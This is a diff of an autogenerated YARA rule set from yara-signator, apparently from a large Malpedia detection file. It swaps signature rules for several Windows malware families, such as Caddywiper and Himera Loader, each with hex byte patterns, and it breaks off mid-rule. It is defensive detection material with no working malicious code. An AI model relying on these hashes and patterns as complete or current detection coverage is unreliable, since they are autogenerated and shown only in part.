"12a75630b6f84d2ec097d0e96068cb391171b00fda112afc8eea40b8efef358b" + logic_hash = "f4483696db263dfbbabb83dfce8ccde9309b112a65cf425cc63ed3dc1fcead40" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -150326,38 +153151,32 @@ rule MALPEDIA_Win_Moker_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0302 8945d4 8b4dd4 83c102 } - $sequence_1 = { 0302 8945e8 eb09 8b45e8 } - $sequence_2 = { 0302 8945e8 8b4df8 8b55fc } - $sequence_3 = { 0302 50 e8???????? 83c404 3b450c 750b 8b4df0 } - $sequence_4 = { 0301 8945e0 e8???????? 8b55e8 } - $sequence_5 = { 0302 8945dc 8b45dc 83c002 } - $sequence_6 = { 6a00 6a04 6a01 68000000c0 } - $sequence_7 = { 0100 83c414 85c0 7502 eb0a } - $sequence_8 = { 89e5 ff7508 ed 2e5c 034508 } - $sequence_9 = { 48 8b7c2428 48 39f7 7413 fc } - $sequence_10 = { 49 8b4c2408 ffd0 48 } - $sequence_11 = { d16000 d0806200a501 40 00b070e000e0 31e0 00d5 31c0 } - $sequence_12 = { 880424 49 89442430 49 89742458 66813e4d5a } - $sequence_13 = { 50 51 52 48 } - $sequence_14 = { c20800 55 89e5 ff750c ed } - $sequence_15 = { 89e5 60 8b7d08 6887000000 ed } + $sequence_0 = { 448bcf 895c2428 33d2 33c9 4889442420 488bf0 ff15???????? } + $sequence_1 = { ff15???????? 85c0 7428 488bcd 488d1545f80000 } + $sequence_2 = { 488b8188000000 488d0d16fa0000 4883c018 7452 8bd7 0f1000 } + $sequence_3 = { ff15???????? 41b904000000 c7452060ea0000 4c8d4520 } + $sequence_4 = { 4c8d0dd6860000 c5f35cca c4c173590cc1 4c8d0da5760000 c5f359c1 } + $sequence_5 = { 49ffc0 47382c04 75f7 488d157c1f0100 } + $sequence_6 = { 4c89742430 448bcf 895c2428 33d2 33c9 4889442420 } + $sequence_7 = { f20f1000 8b7808 e9???????? 488d05eed70000 4a8b0ce8 42f644313880 744d } + $sequence_8 = { 4c8d0d136d0000 8bf9 488d15ba4d0000 b906000000 4c8d05f66c0000 e8???????? } + $sequence_9 = { 4180e003 80e30f 41c0e004 440ac0 } condition: - 7 of them and filesize <1761280 + 7 of them and filesize <262144 } -rule MALPEDIA_Win_Mirrorkey_Auto : FILE +rule MALPEDIA_Win_Caddywiper_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e800f2ca-d12e-53d0-a0d8-c0a956e2c2e3" + id = "24926b93-f761-5ed3-a63e-3417e035ba52" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirrorkey" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mirrorkey_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.caddywiper" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.caddywiper_auto.yar#L1-L116" license_url = "N/A" - logic_hash = "63df7495a525d1f228b934ad2c4fefa8fb21a89fd4e60713963ec70e2cb5c67e" + logic_hash = "79a75ac7d216323abd7ca177a49671b9ea50088d3b0d895d69cfd4d03ce4d9ea" score = 75 quality = 75 tags = "FILE" @@ -150371,32 +153190,32 @@ rule MALPEDIA_Win_Mirrorkey_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0f57c0 0f1145d8 ff15???????? c70016000000 ff15???????? 8d45d4 50 } - $sequence_1 = { 895914 0fb77806 85ff 7414 8d4b10 8b4104 0301 } - $sequence_2 = { ff15???????? 83c40c c744241000000000 33c0 c644242c00 8944242d 8d742433 } - $sequence_3 = { 8bf9 8b7508 8d45a4 50 } - $sequence_4 = { 83c004 8b7dfc 83ff01 7f87 5f } - $sequence_5 = { 730b 68???????? ff15???????? 894610 837e1410 } - $sequence_6 = { 897508 2bda ebaa 8d5aff 83c704 eba2 } - $sequence_7 = { 8d4dd8 50 e8???????? 8d4d8c e8???????? 837de808 7d15 } - $sequence_8 = { 6a00 51 89542414 ff15???????? 83c408 83f8ff } - $sequence_9 = { 53 8b5d0c 894dfc 8b4d08 56 } + $sequence_0 = { 8345b404 66837dac00 75c4 c745a800000000 } + $sequence_1 = { c68592feffff64 c68593feffff00 c68594feffff76 c68595feffff00 c68596feffff61 c68597feffff00 } + $sequence_2 = { 51 e8???????? 83c408 8985b0fbffff c785f4f1ffff00000000 c68588fbffff4c } + $sequence_3 = { e9???????? 6a00 8b95acf1ffff 52 ff9564f7ffff } + $sequence_4 = { 8b4dfc 8b5508 c7048a00000000 ebd7 } + $sequence_5 = { c645b900 c645ba39 c645bb00 c645bc00 c645bd00 8d4d98 898df4f7ffff } + $sequence_6 = { c685a3feffff00 c685a4feffff6c c685a5feffff00 c685a6feffff6c c685a7feffff00 } + $sequence_7 = { c6459264 c6459300 8d458c 50 8d8d90feffff } + $sequence_8 = { 8985fcf7ffff 8d55c0 52 8d45dc } + $sequence_9 = { 7407 8b4598 50 ff55fc 8b4594 8be5 } condition: - 7 of them and filesize <117760 + 7 of them and filesize <33792 } -rule MALPEDIA_Win_Startpage_Auto : FILE +rule MALPEDIA_Win_Saigon_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "bf47ff90-3238-555c-bf4a-537084ae22d6" + id = "a473943a-8ea5-58ac-80e3-98de6dfb8169" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.startpage" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.startpage_auto.yar#L1-L133" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.saigon" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.saigon_auto.yar#L1-L121" license_url = "N/A" - logic_hash = "9dae8bd02cc42718a63c04f81edbd9a29e9f4300c24f882a2c1fba0669713697" + logic_hash = "a5d9048555d265aef66c2410783198e6f4dd9139107e5b71b76341530d3b556c" score = 75 quality = 75 tags = "FILE" @@ -150410,32 +153229,32 @@ rule MALPEDIA_Win_Startpage_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8945ec 85db 740c 8b0b 85c9 7406 0fb701 } - $sequence_1 = { 83eb01 75f1 8b75f8 8b06 33c9 663b08 759d } - $sequence_2 = { 75f5 2bd1 d1fa 5b 52 ff7508 8bcf } - $sequence_3 = { 8901 89742410 eb06 8931 8b742410 8b44241c 85c0 } - $sequence_4 = { 8bec a1???????? 85c0 740e 50 e8???????? 8325????????00 } - $sequence_5 = { 722e 8b4dc0 40 3d00100000 721a f6c11f 759c } - $sequence_6 = { 8b03 8bfb 53 ff5004 8b7508 33c9 8bc3 } - $sequence_7 = { e8???????? 59 c645fc01 8b8de0feffff 83c1f0 e8???????? 51 } - $sequence_8 = { 755f 8a0a 8d4201 8907 80f975 7553 8b4db8 } - $sequence_9 = { 8907 50 50 8945fc ff35???????? ff31 } + $sequence_0 = { 7508 ff15???????? 8bd8 4c8d5c2450 8bc3 498b5b20 498b6b28 } + $sequence_1 = { 4889442440 488364243800 488364243000 4533c0 488bd3 33c9 } + $sequence_2 = { ff15???????? 33ed 488bcb 85c0 } + $sequence_3 = { 7459 f60301 742c 418bcf 488bd0 4903cc e8???????? } + $sequence_4 = { 488b0d???????? 4c8bc7 33d2 8bd8 ff15???????? eb1e } + $sequence_5 = { 4156 4157 4883ec60 4c8bea 488d50c8 4d8bf9 e8???????? } + $sequence_6 = { ffd0 85c0 790e 8bc8 } + $sequence_7 = { 4c8d8584020000 488d8c2460060000 448bcb 418bd6 e8???????? } + $sequence_8 = { 33d2 8d440036 448bc0 448be0 ff15???????? } + $sequence_9 = { 8d4f01 448bcf 4c8bc6 894c2428 33c9 33d2 } condition: - 7 of them and filesize <2277376 + 7 of them and filesize <147456 } -rule MALPEDIA_Win_Colibri_Auto : FILE +rule MALPEDIA_Win_Banjori_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "92334149-98b7-5fb0-8e08-056f3f401efb" + id = "0d7b2a6e-e2ca-5160-9081-9a7cfdf5e1be" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.colibri" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.colibri_auto.yar#L1-L126" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.banjori" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.banjori_auto.yar#L1-L133" license_url = "N/A" - logic_hash = "70a6e8c65b49a36e967be3c5e646c3791445447505e2691dc2dc449a828d2e49" + logic_hash = "9dcfb5d77d585c9251303d49a0603c551cff0efcfccd66cc7c87519a0e64ecdd" score = 75 quality = 75 tags = "FILE" @@ -150449,32 +153268,32 @@ rule MALPEDIA_Win_Colibri_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b4dfc 8d4901 e8???????? 56 56 8bd8 } - $sequence_1 = { 0f4575f4 59 e8???????? ba1f90113c 8bc8 e8???????? ffd0 } - $sequence_2 = { 83c602 0fb706 8bd0 6685c0 75e2 8933 33c0 } - $sequence_3 = { 8bf1 8bfa 897df8 85f6 7502 } - $sequence_4 = { 897c2440 57 eba2 8364243c00 eb1b } - $sequence_5 = { 8d8578f9ffff 33ff 6804010000 50 57 6a02 59 } - $sequence_6 = { 8365f800 50 e8???????? 59 85c0 7413 8b4dfc } - $sequence_7 = { 668945a4 6689855effffff 66894d96 59 6a76 58 6a69 } - $sequence_8 = { 7445 8b4878 85c9 743e 33ff 39787c 7437 } - $sequence_9 = { c1e81f 8d0448 8b0c85c0124000 8d45d4 } + $sequence_0 = { 6800010000 e8???????? 8945f4 81f9000c0000 7308 e8???????? 8945f0 } + $sequence_1 = { 50 ff15???????? ffb5a0feffff e8???????? 53 53 53 } + $sequence_2 = { 68???????? ff75fc ff15???????? 53 ff75fc ff15???????? 68???????? } + $sequence_3 = { ff750c 53 53 53 53 ff7508 ff35???????? } + $sequence_4 = { 78e1 8945e8 eb18 8d85aafeffff 50 ff75e8 ff15???????? } + $sequence_5 = { 85c0 7539 68???????? e8???????? 85c0 752b } + $sequence_6 = { 6802000080 e8???????? 85c0 0f85fe000000 895df0 8d45f0 50 } + $sequence_7 = { 8945f4 8d45f8 50 6819000200 6a00 68???????? 6802000080 } + $sequence_8 = { 50 ff35???????? e8???????? e9???????? c745f864000000 68???????? ff15???????? } + $sequence_9 = { 6a10 8d45b4 50 ff75c4 ff15???????? 85c0 0f883a020000 } condition: - 7 of them and filesize <51200 + 7 of them and filesize <139264 } -rule MALPEDIA_Win_Funny_Dream_Auto : FILE +rule MALPEDIA_Win_Himera_Loader_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "342150e9-e685-51fd-bb6e-825e56ff33ab" + id = "e46aed8f-6384-5100-b12a-1e2dd8afe756" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.funny_dream" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.funny_dream_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.himera_loader" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.himera_loader_auto.yar#L1-L127" license_url = "N/A" - logic_hash = "93298c694e8a0e9daec0c22ddb9409f4c4088b474ade93c3bf4d76bcd798f980" + logic_hash = "ec88d24287290abbd140c4f0211e2582e892064d8e933b967abedc9a00192e9f" score = 75 quality = 75 tags = "FILE" @@ -150488,32 +153307,32 @@ rule MALPEDIA_Win_Funny_Dream_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c785e0ddffff01000000 50 6880000000 68ffff0000 ffb3c0000000 } - $sequence_1 = { 6a00 ff7728 ffd6 6a00 ff7724 ff15???????? 8b4714 } - $sequence_2 = { c745d45368656c 50 53 c745d86c457865 c745dc63757465 66c745e04100 } - $sequence_3 = { 85c0 0f8494000000 33c9 8a840d3cffffff } - $sequence_4 = { ff15???????? 85c0 0f85e7feffff 8d4704 899da0fdffff } - $sequence_5 = { 6a00 6800040000 8d842458030000 50 } - $sequence_6 = { 50 57 ff15???????? 85c0 7523 8b4618 8b3d???????? } - $sequence_7 = { 50 ff15???????? 8d442408 c744240810000000 50 8d442414 0f57c0 } - $sequence_8 = { 85c0 0f84f8000000 68???????? 50 ff15???????? } - $sequence_9 = { 83c404 8b4f04 85c9 7504 33c0 eb05 8b4708 } + $sequence_0 = { e8???????? 83c408 8b4dfc 6689411e 6a10 } + $sequence_1 = { 64a300000000 894de0 c745dc0c000000 c645e45e c645e55d } + $sequence_2 = { 8b4d08 0fb71401 52 e8???????? 83c408 8b4dfc 66894130 } + $sequence_3 = { 8d85dcfdffff 50 8d8df8feffff 51 8d95f8feffff 52 8d8deffdffff } + $sequence_4 = { c20400 e8???????? 85c0 0f84c1510000 } + $sequence_5 = { c645eb1c c645ec2e 64a12c000000 8b08 8b15???????? 3b9104000000 7e4c } + $sequence_6 = { 50 8d45f4 64a300000000 894de0 c745dc0a000000 c645e440 c645e55a } + $sequence_7 = { c7459c49000000 c645a463 c645a541 c645a654 c645a747 c645a842 c645a942 } + $sequence_8 = { c645e801 c645e90e c645ea18 c645eb1a c645ec00 c645ed1e c645ee2e } + $sequence_9 = { c745fc00000000 eb09 8b45fc 83c001 8945fc 837dfc25 7321 } condition: - 7 of them and filesize <393216 + 7 of them and filesize <385024 } -rule MALPEDIA_Win_Covid22_Auto : FILE +rule MALPEDIA_Win_Newposthings_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "c5fffc59-fc04-58e5-a2b5-2bc6fea3300e" + id = "d2908836-d6a9-5323-a30e-68bb82428f91" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.covid22" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.covid22_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.newposthings" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.newposthings_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "905302ef095dc2c070563a8e4e5a8650bbd8c803b32ba6a0b53beb2cdcb2cfaa" + logic_hash = "aacccdc30f2a004211f7fc15df6e0bf41cf9693ce7a4e367dede73ae07376ff4" score = 75 quality = 75 tags = "FILE" @@ -150527,32 +153346,32 @@ rule MALPEDIA_Win_Covid22_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b35???????? 7507 6af6 ffd6 894514 395d18 7507 } - $sequence_1 = { 50 8b4508 ff30 ff15???????? 8b45fc c9 } - $sequence_2 = { 5a e8???????? ff35???????? 6801000000 e8???????? 21c0 } - $sequence_3 = { e8???????? ba???????? 8d0d30b24000 e8???????? ba???????? 8d0d34b24000 e8???????? } - $sequence_4 = { 0fb6540c02 83e20f 0fb692e0904000 885005 0fb6540c03 c1ea04 0fb692e0904000 } - $sequence_5 = { ff35???????? e8???????? 21c0 0f846f020000 a1???????? } - $sequence_6 = { 50 a1???????? 50 50 e8???????? ff05???????? ff35???????? } - $sequence_7 = { b801000000 eb02 31c0 21c0 0f8409020000 a1???????? } - $sequence_8 = { e8???????? c21000 8b442404 85c0 7413 ff742408 ff30 } - $sequence_9 = { 83c404 6801000000 e9???????? 8b15???????? 31c9 e8???????? 750b } + $sequence_0 = { 8a4601 3c30 7c04 3c39 7e0a 3c3d 7406 } + $sequence_1 = { 7423 3d00000400 7550 80c980 884c3704 8b0c9d481d0210 8a443124 } + $sequence_2 = { 83e61f 8b0485481d0210 c1e606 80643004fd 8b45f8 8b55fc 5f } + $sequence_3 = { ff7510 ff750c 56 6843120110 e8???????? 83c418 85c0 } + $sequence_4 = { 83c602 663906 74f8 6a03 56 68548e0110 e8???????? } + $sequence_5 = { 50 c644245c00 8bce e8???????? 8bf0 eb02 33f6 } + $sequence_6 = { e8???????? 50 8bcb e8???????? c745fc00000000 c745f001000000 8bc3 } + $sequence_7 = { 8b049538f34500 47 ff3418 ff15???????? 85c0 750a ff15???????? } + $sequence_8 = { 83c204 8955e0 eb86 890cb538f34500 } + $sequence_9 = { e8???????? c745fc00000000 83ec18 8bcc 896588 6aff } condition: - 7 of them and filesize <1955840 + 7 of them and filesize <827392 } -rule MALPEDIA_Win_Comebacker_Auto : FILE +rule MALPEDIA_Win_Zxxz_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "af10d661-f74a-5650-87c7-273e1e7e9537" + id = "47a6bdd7-280d-5812-824e-6730815c0329" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.comebacker" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.comebacker_auto.yar#L1-L159" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zxxz" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.zxxz_auto.yar#L1-L117" license_url = "N/A" - logic_hash = "4674cd33cc3ed96f3f2fa7f30959d540c5b651afcce920e84c014122f3c7af23" + logic_hash = "1197698292204c5d5bb6df77b7c0541f4794374692dc94417033752fb1a653dc" score = 75 quality = 75 tags = "FILE" @@ -150566,37 +153385,32 @@ rule MALPEDIA_Win_Comebacker_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6683f809 7f04 0430 eb02 } - $sequence_1 = { 4c8d0d7ad60300 8d5049 8d48e0 448d4013 c7442420bb020000 e8???????? } - $sequence_2 = { 41894704 418bc4 48c1e810 0fb6c8 418bc0 0fb6943170e30400 } - $sequence_3 = { 4c8d0dc2a10300 8d5078 8d4803 448d4041 } - $sequence_4 = { 4c8d9db0070000 488d8580020000 4c895c2440 89742438 4489742430 } - $sequence_5 = { 3241ff 48ffca 88440bff 75ed 488bfe } - $sequence_6 = { 4c8d0daf4d0300 baca000000 b910000000 e8???????? 488bcf } - $sequence_7 = { 4c89ac2408290300 664489b5a0050000 e8???????? 488d8d92030000 } - $sequence_8 = { ff15???????? 83bdc4f8ffff00 741c 68???????? e8???????? 69c0e8030000 83c404 } - $sequence_9 = { c74424183ba7ca84 c744241c85ae67bb c74424202bf894fe c744242472f36e3c } - $sequence_10 = { 8a44242a 8b1c8d38640410 8b048538600410 8bca 33c3 } - $sequence_11 = { 8d1433 52 50 ff15???????? 85c0 0f8435ffffff 8b15???????? } - $sequence_12 = { 68???????? 52 ffd7 8d85fcf7ffff 83c408 8d5002 668b08 } - $sequence_13 = { 83f906 0f87c1000000 ff248d302a0210 8b4810 85c9 74d6 8b490c } - $sequence_14 = { 8b8dacfeffff 51 e8???????? 8b9db0feffff } + $sequence_0 = { 40 84c9 75ef bf???????? e8???????? 84c0 } + $sequence_1 = { 8b4c244c 64890d00000000 59 5f 5e 5d 8b4c2434 } + $sequence_2 = { be04010000 51 89742424 6689842424010000 e8???????? } + $sequence_3 = { 84c9 75f9 2bc2 8bd0 33c0 33c9 } + $sequence_4 = { c3 81ecc4010000 a1???????? 33c4 898424bc010000 } + $sequence_5 = { 7424 8b1d???????? 8d54242c 57 } + $sequence_6 = { ff15???????? 85c0 7539 3805???????? } + $sequence_7 = { 7403 8811 41 40 803800 75f0 } + $sequence_8 = { 681c020000 68???????? ffd6 83c40c 68???????? } + $sequence_9 = { ff15???????? 8b3d???????? 8bf0 56 6a01 } condition: - 7 of them and filesize <1429504 + 7 of them and filesize <4142080 } -rule MALPEDIA_Win_Tinyfluff_Auto : FILE +rule MALPEDIA_Win_Divergent_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "68615fcb-8e02-5dda-b945-ad2728dc7f08" + id = "14cdfb94-4b91-530e-a0fa-873505b81024" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyfluff" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tinyfluff_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.divergent" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.divergent_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "7b6f89788f810db3773be969b0bf83c7846502ce63a8bb1297c4bbad49f7e342" + logic_hash = "60d51f83c6b67d5042579114a766b27aab37221121fff155d69e0a695b8fbbca" score = 75 quality = 75 tags = "FILE" @@ -150610,32 +153424,32 @@ rule MALPEDIA_Win_Tinyfluff_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0f84982c0000 c3 833d????????ff 7503 33c0 c3 53 } - $sequence_1 = { 8b04bd50704100 03c1 885c302e 46 3bf2 } - $sequence_2 = { 83e03f c1f906 6bc038 03048d50704100 } - $sequence_3 = { 85c0 7418 8b858cfbffff 85c0 7407 50 } - $sequence_4 = { ff15???????? 33f6 e9???????? 8d8de0fbffff 8d5102 668b01 83c102 } - $sequence_5 = { 8b049550704100 57 8b7d10 897d98 8955b4 } - $sequence_6 = { 83c410 ebe6 8b45f0 8b0c8550704100 8b45f8 807c012800 } - $sequence_7 = { 50 6af6 ff15???????? 8b04bd50704100 834c0318ff 33c0 } - $sequence_8 = { 56 57 83781408 8bf9 8bf2 897dfc 8bd0 } - $sequence_9 = { c1fa06 8934b8 8bc7 83e03f 6bc838 8b049550704100 8b440818 } + $sequence_0 = { 8bc1 880438 40 3d00010000 7cf5 8b450c } + $sequence_1 = { 83c418 85db 0f8537ffffff 5f 5e 68???????? ff15???????? } + $sequence_2 = { 3b4510 7518 ff7510 8b4704 ff750c } + $sequence_3 = { 85c0 750a 830604 5e 5d e9???????? 33c0 } + $sequence_4 = { ff15???????? 837e0800 7412 ff7608 ff15???????? ff7608 e8???????? } + $sequence_5 = { 3bf1 7421 3bf9 741d 3bc1 7419 c1e204 } + $sequence_6 = { 85db 0f84da000000 3975f4 0f84d1000000 53 e8???????? 8945e4 } + $sequence_7 = { 5d c3 ff25???????? 55 8bec 837d0800 741f } + $sequence_8 = { e8???????? 8bf8 83c414 85ff 742c 8b463c ff743054 } + $sequence_9 = { 0fb6f1 0fb6ca 0fb60406 034510 03c8 81e1ff000080 7908 } condition: - 7 of them and filesize <245760 + 7 of them and filesize <212992 } -rule MALPEDIA_Win_Allaple_Auto : FILE +rule MALPEDIA_Win_Graphite_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "3189c357-03ca-579b-a008-778eac3a8556" + id = "22d6771d-6e02-5bad-92aa-7abf2f0540bc" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.allaple" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.allaple_auto.yar#L1-L133" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphite" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.graphite_auto.yar#L1-L109" license_url = "N/A" - logic_hash = "415071fc213b7748f93f2d59f832b2786979b53afe7fe779d13e0c2bb9460bfe" + logic_hash = "fac8314c02add0a1a3fcfc7bc6cd359f12eb58a8246911250bf475b51a803e3f" score = 75 quality = 75 tags = "FILE" @@ -150649,32 +153463,32 @@ rule MALPEDIA_Win_Allaple_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 ff75a0 e8???????? 83f8ff 756a e8???????? 3d33270000 } - $sequence_1 = { 7708 2b7b0c 037b14 eb0f 83c328 83c628 } - $sequence_2 = { 6a40 8b55a8 8d4db0 e8???????? 8b55f8 2355f4 8b45f8 } - $sequence_3 = { 6a14 ff7508 57 e8???????? 83c714 c70701000000 83c704 } - $sequence_4 = { 6800800000 6a00 ff75e0 e8???????? eb09 0bc0 7505 } - $sequence_5 = { 55 8bec 83ec24 8955e0 894de4 c745fc00000000 8b45fc } - $sequence_6 = { 894174 8b55fc 8b4278 3345f4 8b4df8 894178 8b55fc } - $sequence_7 = { 0f8539010000 8145f8bc020000 ff75f8 e8???????? 8945f4 ff75fc ff75f4 } - $sequence_8 = { ff45fc 8b45fc 3b4510 7ce5 8be5 5d c3 } - $sequence_9 = { 8b4df8 894178 8b55fc 8b427c 3345f4 8b4df8 89417c } + $sequence_0 = { 7513 33d2 e8???????? 84c0 } + $sequence_1 = { 33d2 e8???????? 84c0 74e4 } + $sequence_2 = { 81e2ff030000 81e1bf030000 83c940 c1e10a } + $sequence_3 = { 7513 33d2 e8???????? 84c0 74e4 } + $sequence_4 = { 81e1bf030000 83c940 c1e10a 0bca } + $sequence_5 = { ff15???????? 33c0 eb05 b801010000 } + $sequence_6 = { 85db 7513 33d2 e8???????? 84c0 74e4 } + $sequence_7 = { 85db 7513 33d2 e8???????? 84c0 } + $sequence_8 = { 85db 7513 33d2 e8???????? } + $sequence_9 = { 81e2ff030000 81e1bf030000 83c940 c1e10a 0bca } condition: - 7 of them and filesize <253952 + 7 of them and filesize <98304 } -rule MALPEDIA_Win_Loup_Auto : FILE +rule MALPEDIA_Win_Hzrat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f9d1b576-d285-5231-afcb-2e4f16800d77" + id = "4d1bc827-a443-5a54-876f-91ca96256a66" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.loup" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.loup_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hzrat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hzrat_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "ff0573e37f479d8813fb50aaed8f812906a0bad4de56fabb213fa961c6890498" + logic_hash = "4c8da289e225a98c903b1e25bb40a32ef5f7bbd72fec724a7ddbf67c4f6841b8" score = 75 quality = 75 tags = "FILE" @@ -150688,32 +153502,32 @@ rule MALPEDIA_Win_Loup_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83c404 85c0 741c 0fb745f4 50 e8???????? } - $sequence_1 = { 81781422059319 740c 8b4dfc 81791400409901 7522 e8???????? 8b55fc } - $sequence_2 = { 8b0d???????? 898dc8fbffff 8b15???????? 8995ccfbffff a1???????? 8985d0fbffff } - $sequence_3 = { 8b85d0f1ffff 53 56 ff3485647b4100 50 } - $sequence_4 = { 8b7508 57 85d2 744f 33ff 393a } - $sequence_5 = { 81f247656e75 b804000000 6bc803 8b440de0 35696e6549 } - $sequence_6 = { 8b4df4 84c0 0f84defeffff c745dc01000000 e9???????? 5f 5e } - $sequence_7 = { 668945e8 33c0 668945ea c745ee01000000 b804000000 668945ec } - $sequence_8 = { b804000000 c1e002 c784055cffffff01000000 8d855cffffff 8945d5 } - $sequence_9 = { 85c0 7443 0fb745f4 50 } + $sequence_0 = { 7526 c745f500000000 8d4df4 8075f642 8075f742 8075f842 6a00 } + $sequence_1 = { ff15???????? 6689442412 8b44240c 89442414 8d442410 6a10 50 } + $sequence_2 = { 8bce ff7508 8b4020 ffd0 8b17 8bcf 8ad8 } + $sequence_3 = { 03da 81fa00010000 7312 8a8758e94200 0803 42 0fb64101 } + $sequence_4 = { 51 e8???????? 83c408 80bd93feffff00 c6856cfeffff00 7445 } + $sequence_5 = { 0faee8 e8???????? 8bc8 83c404 85c9 747d } + $sequence_6 = { 7410 fe8860f14200 8a8060f14200 84c0 7f1f 8bce e8???????? } + $sequence_7 = { dd4520 83c40c c9 c3 8b04c5c4324200 } + $sequence_8 = { 7312 0faee8 8b5104 8b4208 } + $sequence_9 = { c60000 c645fc03 8b9544fbffff 83fa10 } condition: - 7 of them and filesize <257024 + 7 of them and filesize <409600 } -rule MALPEDIA_Win_Vflooder_Auto : FILE +rule MALPEDIA_Win_Collectorgoomba_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "9887b2d4-11f9-501f-8a80-a11d525400b9" + id = "ee60f6dc-0e40-5600-9363-18addef799db" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vflooder" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.vflooder_auto.yar#L1-L106" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.collectorgoomba" + source_url = 